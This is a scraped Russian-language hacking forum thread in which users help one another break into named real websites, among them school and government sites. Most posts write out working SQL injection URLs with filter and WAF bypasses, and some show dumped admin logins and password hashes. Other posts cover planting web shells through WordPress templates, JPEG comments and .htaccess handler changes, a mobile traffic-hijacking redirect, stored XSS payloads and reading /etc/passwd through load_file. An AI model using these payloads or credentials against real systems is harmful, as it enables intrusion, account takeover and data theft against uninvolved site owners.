не поможите таблицу с данными админа найти,просто на сайте как таковых пользователей нет т.к там нет ничего(ни форума ни каких-то отзывов ну и ничего,для чего собственно и регестрируются люди) но на главной странице есть форма входа при нажатии "вход" с пустыми полями ведёт на /admin/index.php судя по всему админка,ну значит и таблица с данными должна быть вот сайт http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,table_NAME,3,4,5+FROM+INFORMATION _SCHEMA.tables+limit+0,1


Moodle ^_^


Code:
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,(%73elect(@x)%66rom(%73elect(@x:= 0x00),(%73elect(null)%66rom(%69nformation_schema.% 63olumns)%77here(%74able_schema!=0x696e666f726d617 4696f6e5f736368656d61)%61nd(0x00)%69n(@x:=%63oncat (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,% 63olumn_name))))x),3,4,5

Ereee said:

Code:
AddType application/x-httpd-php .css .shtml

Подозрительно ^.
PHP/Javascript-редирект сделать легко.
Пример PHP:

PHP:
if ($version!="desktop") {

$useragent=$_SERVER['HTTP_USER_AGENT'];

if(preg_match('/android|avantgo|blackberry|blazer|compal|elaine|fe nnec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|opera m(ob|in)i|palm( os)?|phone |p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link )|vodafone|wap|windows (ce|phone)|xda|xiino/i',$useragent)||preg_match('/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar (ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|b r(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a |jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|e\-|e\/|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|d o|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran |owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|t cl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(4 0|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98 )|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|xda(\-|2|g)|yas\-|your|zeto|zte\-/i',substr($useragent,0,4)))

header('Location: http://TRAFF');

}

Javascript:

Code:




Я удалил строчку с .htaccess

AddType application/x-httpd-php .css .shtml

Все равно трафф не идет

Moriarty said:
это же космический ...дец!
ну чуть ниже! на 10-15 пикселей ниже твоего хтаксес кода(в промо разделе пиратов)! совсем на чуть чуть! находится js-код который делает тоже самое, дружище! удачи!
а вообще проверь id суббака! скорей это не админ, а кто то трафф тырит!
зы. и с чьего же ты благословения на скайп то льешь...


как проверить id суббака?

Code:
http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29--

Does not work, WAF?

Многие наверно видели уязвимость булки отсюда


/showpost.php?p=2833234&postcount=127


Вопрос:

Как откорректировать запрос, если ответ от БД &


does_forum.user


Я делал запрос вида


humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

вот отлично вот вывел инфу Adminusti,obz:zbo и что тут что? admin-логин а остальное пароль или pusti-логин а остальное пароль?


Смотря какие поля ты выводил

lightangel said:

Code:
http://www.awt.com.pk/news_detail.php?news_id=5+/*!union*/+/*!select*/+1+/!*group_concat*/%28table_name%29,3,4,5+from+/!*information_schema*/.tables%20where%20table_shcema=database%28%29--

Does not work, WAF?


waf!!

that's work )))

http://www.awt.com.pk/news_detail.php?news_id=-5+union+/*!select*/+1,2,3,4,/*!table_name*/+from+information_schema./*!tables*/+where+table_schema=0x617774636F6D5F617774+limit+0 ,10--

ivan151 said:
вывел с разных полей получилось логин Admin пасс pusti а что тогда obz:zbo? и с такими данными пишет ошибку авторизации,странно вообще как то


если ты все верно написал то должно быть так-

Adminusti,obz - login

zbo - password

p.s.

разделитель у тебя 0x3a= :

pirat0 said:
если ты все верно написал то должно быть так-
Adminusti,obz - login
zbo - password
p.s.
разделитель у тебя 0x3a= :


Херню посоветовал. Там же group_concat а не просто concat или concat_ws используется. Поэтому вывелось 2 акка, разделитель :. Выходит так:

логин - Admin

пароль - pusti

со 2 (тот что через запятую) точно также.

ivan151 said:
вот с разных полей вообще получается Admin-логин
pusti-пароль http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,login,3,4,password+from+lsh_infou sers


там походу два акка пользователей, в этой таблице, и ни один из них не авторизуется на сайте, поэтому я попробывал запрос http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(table_name,0x3a,colu mn_name),3,4,5+from+information_schema.columns+whe re+column_name+like(0x257061737325)--+

и там еще есть таблички с колонкой пассворд попробуй перебрать их

например вот эту mdl_userassword

Ребята помогите раскрутить эту скулю

http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7

ivan151 said:
не пускает с такими данными-ошибка авторизации,а может кто нибудь посоветует как быть?линк дал


Данные правильные вот


Code:
1
Admin
pusti
Администратор,

2
obz
zbo
ОБЖ

anonym_di said:
Ребята помогите раскрутить эту скулю
http://www.mk.gov.kz/?lang=kaz&id_open_rubric=361&page=7


id_open_rubri - макс 5 символов

page - подставляется в лимит, скули нету.

2IVAN

я же тебе писал не поленись перебери таблицы, если этот сайт для тебя важен,

писал про таблицу mdl_user, вот что из туда выпало:

http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(0x3a,id,username,0x3 a,password),3,4,5+from+u99526_moodle.mdl_user


Code:
,:2admin:6c83c300238522d49d616550f45f9394,:3uraev: 622694bd4f

расшифруй и попробуй авторизоватся

Ruslan1817 said:
http://1liceum.ru/shownew.php?setid=-1+union+SELECT+1,group_concat(login,0x3a,password) %20,3,4,5+from+lsh_infousers+--+
А это чем не по душе?


просто он пишет что авторизоватся на сайте не может с теми даными что получил из таблицы lsh_infousers, я думаю стоит попробывать поискать записи юзверей в других таблицах, и как пример вытянул даные с таблицы mdl_user, где есть запись с login-admin, эту запись остается расшифровать и попробывать залогинится)))

http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+in formation_schema.columns+where+table_name=0x757365 7273--+

А как здесь вытащить столбцы ?

bodrich said:
http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,column_name,3,4,5,6,7,8+from+in formation_schema.columns+where+table_name=0x757365 7273--+
А как здесь вытащить столбцы ?


вариант №1

http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5 ,6,7,8+from+information_schema.columns+where+table _name=0x75736572+limit+0,1--+ (где в хексе user)

вариант №2

http://www.interself.ru/info/newsshow.php?num=-273+union+select+1,group_concat(column_name),3,4,5 ,6,7,8+from+information_schema.columns+where+table _name=0x62346d66715f7573657273+limit+0,1--+ (где в хексе b4mfq_users)

p.s. таблички к которой ты составлял запрос походу нету (users), ну или я ее не нашол))

Ребят, из-за чего в MySQL скуле може НЕ РАБОТАТЬ where?

Первый раз с таким сталкиваюсь. Любой запрос содержащий where не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.

p.s. фильтрации нету вроде ни на что. MySQL >=5

Pirotexnik said:
Ребят, из-за чего в MySQL скуле може
НЕ РАБОТАТЬ
where
?
Первый раз с таким сталкиваюсь. Любой запрос содержащий
where
не отрабатывает... Из-за чего может быть? Есть ли аналоги? Нужно сделать дамп примерно 2 000 000 записей. Лимит естественно ложит БД.
p.s. фильтрации нету вроде ни на что. MySQL >=5


фильтр. хотя слабо верится.

Кто-то сталкивался с такой штукой как Plogger Gallery? Нужно через нее залить шел.

Вот ссылка на сайт галереи:

http://www.plogger.org/

твостер писал (https://antichat.live/threads/156224/) про рутовый шелл, который все команды из под суидника запускает. там r57 был, линк устарел, есть wso или c99?

upd: нашел

Boolean said:
фильтр. хотя слабо верится.


/*!+where+*/ и тому подобные обходы не работают...

Да и кроме WHERE тогда НИЧЕГО не фильтруется? Смысл?

Pirotexnik said:
/*!+where+*/ и тому подобные обходы не работают...
Да и кроме WHERE тогда НИЧЕГО не фильтруется? Смысл?


Показывай ссылку.

Pirotexnik said:
/*!+where+*/ и тому подобные обходы не работают...
Да и кроме WHERE тогда НИЧЕГО не фильтруется? Смысл?


почитай тут может что получится,

/printthread.php?t=195037

ps 3 пункт "Альтернатива where"

как залить шелл в wp 3.2.1 ?

DyukiN said:
как залить шелл в wp 3.2.1 ?


Шаблоны.

Такой вопрос... если у меня есть пассивка, которая находится между тегов

то выполнится ли код в браузерах с фильтром xss(chrome, ie8+)? протестить пока не могу

justonline said:
Такой вопрос... если у меня есть пассивка, которая находится между тегов
то выполнится ли код в браузерах с фильтром xss(chrome, ie8+)? протестить пока не могу


Угу.

Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации

Киев said:
Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации


В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.

Юго said:
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.


полюбому нужно чтоб сервер обрабатывал jpeg как php сценарии, чтоб код в exif исполнялся

http://www.artplast-100.ru/news/22/

http://www.artplast-100.ru/news/22-2/

как быть в таком случае?

http://www.artplast-100.ru/news/22 or 1=1/

http://www.artplast-100.ru/news/22/**/or/**/1=1/*/

и т д.

ReV0LVeR said:
http://www.artplast-100.ru/news/22/
http://www.artplast-100.ru/news/22-2/
как быть в таком случае?
http://www.artplast-100.ru/news/22 or 1=1/
http://www.artplast-100.ru/news/22/**/or/**/1=1/*/
и т д.


http://www.artplast-100.ru/news/(-22)union(select(1),(select(group_concat(schema_nam e))from(information_schema.schemata)),3,4,5,6)/

но все данные могут не влезть

подробный ман (https://forum.antichat.net/thread118842-group_concat.html)

Добрый день

Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1

Вот так можно ли это раскрутить и как за ранее спс!

Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!


Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\


Code:
',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'

Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!


Это оч просто и всего лишь 2 варианта:

1. простой - короткий и понятный ман (https://antichat.live/threads/43966/)

2. сложный - использование программ для автоматической раскрутки скулей.


Ereee said:
Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\

Code:
',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'



Д ты хрен угадаешь что у него там )

Вопрос таков, кручу базу через хавий, показывает базу данных в таком ввиду, что это такое? Почему база так выглядит?

Data Base: J.I~?rl21m)" x~^xk[rr?xWP}S(

Length of 'Data Base' is 17

Data Base: Z.F?`W!e?no]2f3kx

Length of 'Data Base' is 48

Data Base: Gf1?z@D??A&> ]{ijE&??;xLx?oZ/V?5QzRkq3

мм


Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!


делал по манулу /thread43966.html

выбивает ошибку

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6 --', 'ип', 'ваываыв', '2012-02-16 16:34:05',' at line 1

TYPUCT, потому что руками надо делать

кодировка

Revi, ты уверен что там 6?

да и не в этом суть.

экстрасенсы не знают что делать

может пруф уже скинешь, нет?

так вряд ли помогут

faza02 said:
TYPUCT
, потому что руками надо делать
кодировка


Тама млин блайнд, сейчас ковыряюсь, посмотрим.

линк кину в лс

В комментариях не фильтруется ник и текст.

Жду с нетерпением

TYPUCT said:
Вопрос таков, кручу базу через хавий, показывает базу данных в таком ввиду, что это такое? Почему база так выглядит?
Data Base: J.I~?rl21m)" x~^xk[rr?xWP}S(
Length of 'Data Base' is 17
Data Base: Z.F?`W!e?no]2f3kx
Length of 'Data Base' is 48
Data Base: Gf1?z@D??A&> ]{ijE&??;xLx?oZ/V?5QzRkq3


Проблема не в том, что SQL BLIND, а в том что Havij похоже крутит её не через ascii(substring(database(),X,1))=Y а через Time-Based SQL

Как вы уже знаете, данный вид скули сильно зависит от стабильности канала.

Будет лагать канал - получите где то такую же тарабарщину.

Привет

получаю следующую ситуацию:


Code:
/Index.php/cPath/1'

показывает


Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1

Как дальше? Софт ест для это?

james00x said:
Привет
получаю следующую ситуацию:

Code:
/Index.php/cPath/1'

показывает

Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1

Как дальше? Софт ест для это?


Руки для этого есть...


Code:
/Index.php/cPath/1/**/and/**/1=1/**/--

/Index.php/cPath/1/**/and/**/1=0/**/order/**/by/**/X/**/--

BigBear said:
Руки для этого есть...

Code:
/Index.php/cPath/1/**/and/**/1=1/**/--

/Index.php/cPath/1/**/and/**/1=0/**/order/**/by/**/X/**/--





Code:
/Index.php/cPath/1/**/and/**/1=0/**/order/**/by/**/5456443/**/--

не показывает ошибки

Доброго времени суток.

Такой вопрос появился. Есть скуля благо POST запросу.

С кавычкой, выдает в самом верху сайта на белом фоне: "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in..."

Отлично подобрал столбцы. union select 1,2 --, как видим, оказалось 2, ошибка исчезла. Но и не появились поля где может быть скуля. Тобишь не единицы, ни двойки. Решил я подставить что то по типу: version() user() database(). Что тоже не дало никакого результата, кроме того что ошибка исчезала.

Вопрос таков, как выйти из этой ситуации, как можно добиться вывода? Или вообще как тут поступать?

Раскручивай как error-based. Подробнее в гайде от Dr.Zero, найдешь на форуме.

Machine,

/member.php?u=102727

? oO

_/thread43966-sql+injection+%EF%EE%EB%ED%FB%E9.html

Хоть что-нибудь работающее с basic авторизацией+Postgres есть ? Ни хавай,ни бскл во free mode пахать не хотят

Так в хидерах передай логин/пасс. Через LiveHttpHeaders посмотри хидeры и засунь в свои программы.

Помогите раскрутить http://www.dob.ee/listings.php?category=-333'+order+by+1+/*+

чё-то тыкаюсь и никак... =(

http://www.dob.ee/listings.php?category=-333)+order+by+1%23

такой вопросик, как обойти запрет на загрузку файлов с расширением .php (я в админке), через перехват данных не катит, и php1 php2 php3 и т.д. тоже

ps можно заливать txt jpg, но при переименовке грит пшол ты...

pirat0 said:
такой вопросик, как обойти запрет на загрузку файлов с расширением .php (я в админке), через перехват данных не катит, и php1 php2 php3 и т.д. тоже
ps можно заливать txt jpg, но при переименовке грит пшол ты...


Можно попробывать .jpg.php, но вряд ли сработает.

Если каким-либо образом существует доступ к БД, то можно попробывать это. (https://antichat.live/showthread.php/t/34338/)

Chaak said:
Можно попробывать .jpg.php, но вряд ли сработает.
Если каким-либо образом существует доступ к БД, то можно попробывать
это. (https://antichat.live/showthread.php/t/34338/)


неа jpg.php не катит, через скулю тоже не пройдет там фильтруется кавичка.

Я где-то видел статью, или это так может быть хто писал, что можно попробывать альтернативние расширения типа .php, но какие это расширение я не помню((, может кто знает напишите плз.

pirat0 said:
неа jpg.php не катит, через скулю тоже не пройдет там фильтруется кавичка.
Я где-то видел статью, или это так может быть хто писал, что можно попробывать альтернативние расширения типа .php, но какие это расширение я не помню((, может кто знает напишите плз.


Там скорее белый фильтр стоит, чем черный.

Есть ли доступ к .htaccess?


Code:
AddType application/x-httpd-php .php .jpg

Chaak said:
Там скорее белый фильтр стоит, чем черный.
Есть ли доступ к .htaccess?

Code:
AddType application/x-httpd-php .php .jpg



ты имееш ввиду есть ли какая-то читалка на серве??

изменить .htaccess можешь?

чак про это

http://www.forum.antichat.net/showthread.php?p=2935725

Нашел активную xss в самописном движке одного локального сайта.


PHP:


...........

varUNBS={221122:{md:"0",nk:"injs",sex:"m",pic:"01.gif",rc:4,flg:0,hp:101,x:1,y:7,lnm:"111",rnm:"111",lpc:"2222",rpc:"222",inj:[0,0,0,0,0],rt:156.971428571429,tn:0,ah:40,ab:30,al:35,ar:35, af:10}};

.........

functionstart()

{

Redraw();

AddData([{act:14[INJECT],nmb:22},{tm:"16:16",act:1,chng:[{unb:202636351,x:3,y:9,tn:0}]}{tm:"16:19",act:1,chng:[{unb:202636351,x:3,y:9,tn:0}]}],1);

ReloadReq=0;

setTimeout("correctTimer()",1000);

}



в [INJECT] могу вставить любой код.

можно ли средствами js поменять значения первой части скрипта(между точками) с rnm:"111"(например) на rnm:"222"?

В зависимости от того, что делает функция AddData, инъектировать можно, например, }],1);UNBS[221122].rnm='something';//

SecondLife said:
В зависимости от того, что делает функция
AddData
, инъектировать можно, например,
}],1);alert(/xss/);//


мне нельзя прерывать тот код. да вставить алерты как раз плюнуть. мне интересно, можно ли обратиться к коду выше, изменить одну переменную не прерывая adddata. так как я adddata - динамично изменяется и строк так 50 занимает)

Функция AddData будет выполнена, ее вызов мы отменить не можем. Можем только косвенно влиять на результат ее работы, манипулируя передваваемым объектом.

Я подправил предыдущий пост, там вместо алерта присвоение идет.

Впринципе, можно это присвоение сделать и иначе:


Code:
,tmp:UNBS[221122].rnm='something'

Столкнулся с очередным инжектом в MSSQL.При подборе через order by мне выдало 12 полей.ок.Делаю union (без all) по 12 null-полям,ошибка.Решил проверить,что на это скажет панголин - он отослал запрос union all select + 13 null-ов.Работает.Теперь вопрос,почему не работает у меня...

ЗЫ: Возможности глянуть сам запрос нет.

SecondLife said:
http://www.dob.ee/listings.php?category=-333)+order+by+1%23


это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?

...или я чего-то недогоняю... все методы пробовал... и error based не катит...

Qwert321 said:
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...


вообщем там WAF, и два запроса к базе:

1. http://www.dob.ee/listings.php?category=399)+order+by+2%23 - false, true

2.http://www.dob.ee/listings.php?category=399)+order+by+89%23 - false, false (в моей практике впервые столько колонок (88))

+ еще фильтрация union, и =, походу но может и еще на что то, можно пробывать так но чет не пляшет нифига:


Code:
http://www.dob.ee/listings.php?category=333)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,5 1,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67, 68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 ,85,86,87,88%23

походу просто нет принтабельных полей а это значит - blind,

но как раскрутить слепую с фильтром знака "=" я незнаю((

Qwert321 said:
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...


http://www.dob.ee/listings.php

?category=3)and(select+1+from(select+/*!count(*)*/,concat((select+schema_name+from+information_schem a.schemata+limit+1,1),floor(Rand(0)*2))a+from+info rmation_schema.tables+group+by+a)b)%23

Cтоит фильтр на count, обходится как у меня в линке.

Upd:


pirat0 said:
походу просто нет принтабельных полей а это значит - blind,
но как раскрутить слепую с фильтром знака "=" я незнаю((


так же как и обычно. Только правильностью будет false

50 <> 50 = false. То что надо.

pirat0 said:
вообщем там WAF, и два запроса к базе


спасибо...


Melfis said:
Cтоит фильтр на count, обходится как у меня в линке.


спасибо всем ...разобрался...

Code:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0 )+--+

I tried most injections but do not work on it.

lightangel said:

Code:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0 )+--+

I tried most injections but do not work on it.


http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/*!union+select*/+1,concat_ws(0x3a,version(),database(),user()),3,4 ,5,6,7,8,9,0+--+

5.1.56:jigawa_jigawa:jigawa@localhost

use google to translate this: КУРИ МАНУАЛЫ БЛЕАТЬ !11

как узнать сайты на серве, если хттпд конфиги не доступны?

faza02 said:
как узнать сайты на серве, если хттпд конфиги не доступны?


reverse-ip\открываешь индексный файл, ищешь нем строку, уникальную на твой взгляд и гуглишь в кавычках

угу, да, еще можно заглянуть в скл базу, сайтов больше 20

нужны именно варианты с конфигами

Code:
http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+

Why is this showing 500 Internal Server Error?

Haven't seen this before in SQL.

lightangel said:

Code:
http://www.oistbpl.com/groupinfo.php?show=-1+/*!union+select*/+1,2,3,4,5,6+--+

Why is this showing 500 Internal Server Error?
Haven't seen this before in SQL.


крути как слепую

kdiler said:
Как нибудь можно это дело развить?


может стоить попробывать программой, типа хавиджа

kdiler said:
Возникла проблема при попытке раскрутить инъекцию в PostgreSQL.
Имеется адрес вида: При подстановке существующего ID выдается контент, при неверном циферном просто пустая страница.
Подставил кавычку, выдало:
ERROR: invalid input syntax for integer: "`106".
Почитал маны, подставил запрос, скрипт ответил так: .
И что бы я не подставлял, мне приходил подобный ответ.
Как нибудь можно это дело развить?


Либо неправильный синтаксис (где-нить в скуле не хватает скобок и т.п.) или юзается bind / execute

kdiler, выкладывай ссылку.

http://www.1000turov.ru/maps.php?id=8+limit+0,0+union+select+user%28%29,us er%28%29--+


Подскажите, где на странице искать вывод?

и тут


http://www.mciti.ru/box.php?id=8+limit+0,0+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11+from+information_schema.tables--+


чего ошибку выдаёт вместо вывода?

Всем доброго времени суток. Такой вопрос: можно ли загрузить файл на удаленный сервер, в папку у которой права 777 ? К примеру через curl_put , и если можно, покажите пример)

qaz,первый еще смотрю. Во втором предполагаю, что нет доступа к information_schema.

Expantano,

Если есть на уд. сервере обработчик.

такой вопрос, если в запросе при sql inj фильтруется ,,select,, как бить?

qaz said:
такой вопрос, если в запросе при sql inj фильтруется ,,select,, как бить?


Пробуй обойти. /*!select*/, /*!SELeCT*/.

а разве можно изменить данные в табле через иньекцию? тогда что мешает изменить хэш админа который не брутится на нужный нам? залей шелл..из шелла подрубись к БД----> профит

Gorev said:
а разве можно изменить данные в табле через иньекцию? тогда что мешает изменить хэш админа который не брутится на нужный нам? залей шелл..из шелла подрубись к БД----> профит


в MySql так нельзя. В некоторых БД, например Ms Sql можно

Через select нельзя обновить инфу в таблице, можно либо через сам update либо через insert в связке с on dublicate key update.

vaddd said:
в MySql так нельзя. В некоторых БД, например Ms Sql можно


ну вообщето мой вопрос был реторическим..я прекрасно знаю чо можно в мелкософтной БД..но здесь речь о мускулебнужны спец условия для апдейта в мускуле

qaz

По поводу

"""

http://www.mciti.ru/box.php?id=8+limit+0,0+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11+from+information_schema.tables--+

чего ошибку выдаёт вместо вывода?"""

SELECT command denied to user 'gb_mciti'@'10.0.2.4' for table 'tables'

Доступ запрещен, фильтрации там нет.

Извиняюсь вопрос может быть покажется глупым: просканил сайт сканер выдал ошибку:

Возможно подключение к базе данных с помощью учетной записи "blablabla" собственно где эта база и как подключится к ней? Кто ответит пожизненый респект ресурс очень серьёзный))

Kapon said:
Извиняюсь вопрос может быть покажется глупым: просканил сайт сканер выдал ошибку:
Возможно подключение к базе данных с помощью учетной записи "blablabla"
собственно где эта база и как подключится к ней? Кто ответит пожизненый респект ресурс очень серьёзный))


Если там база данных MySQL то TCP порт 3306 (дефолт). Если нет, то включи любой сканнер портов и посмотри где и что. Можешь использовать онлайн версию nmap.

t0ma5 said:
qaz
По поводу
"""
http://www.mciti.ru/box.php?id=8+limit+0,0+union+select+1,table_name,3 ,4,5,6,7,8,9,10,11+from+information_schema.tables--+
чего ошибку выдаёт вместо вывода?"""
SELECT command denied to user 'gb_mciti'@'10.0.2.4' for table 'tables'
Доступ запрещен, фильтрации там нет.


Потому что там нет information_schema по этому и ошибка

winstrool said:
Потому что там нет information_schema по этому и ошибка


А куда-же она делась, не подскажите?

Наверное её админы удалили, да?

Можно ли залить шелл незнаю полного пути?

Revi said:
Можно ли залить шелл незнаю полного пути?


нельзя

Revi said:
Можно ли залить шелл незнаю полного пути?


нет....

можно ли узнать путь через иньку?

ну если в ошибке путь..но он не всегда соответсвует реальности..и еще если у тебя права файл_прив, то прочитай файлы конфигурации на сервере.. найдешь там и путь..

Нашел на одном сайте блинд такого вида

http://www.site.com?id=8'+and+ascii(substring((database() ),7,1))=118+and+'x'='x

пятая ветка мускула

не могу подобрать прогу для ее раскрутки

если можно дайте ссылку , на скрипт и прогу которой можно ее раскрутить

http://www.biostar-russia.ru/app/ru/vga/series.php?S_ID=-55+/*!union*/+/*!select*/+1+--+

не получается подобрать кол-во колонок..

кроме еррор-базе никак?

ммм


Gorev said:
ну если в ошибке путь..но он не всегда соответсвует реальности..и еще если у тебя права файл_прив, то прочитай файлы конфигурации на сервере.. найдешь там и путь..


можно ссылку именно на то что ты сказал

короче просто ищи файл phpinfo

Faaax said:
короче просто ищи файл phpinfo


phpinfo.php не всегда есть а вот httpd.conf всегда

вв


Gorev said:
phpinfo.php не всегда есть а вот httpd.conf всегда


вопрос как его просто искать в папках или через иньку открыть?

Revi said:
вопрос как его просто искать в папках или через иньку открыть?


через иньекцию читай...

пытаюсь выполнить код

2'AND(extractvalue(1,concat(0x3a,(select(load_file (0x2F6574632F706173737764))))))!='21312

почему то читает только первую строчку их файла. Как читать последующие строчки?

Error-based выводит 64 байт. Юзай mid().

2'AND(extractvalue(1,concat(0x3a,(select(mid(load_ file(0x2F6574632F706173737764),1,64))))))!='21312

Начинает с первого читает до 64-символа.

Code:
// проверяем тип файла
$types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
$types = str_replace('php', '', $types);
$types = str_replace('htm', '', $types);
$types = str_replace('htaccess', '', $types);
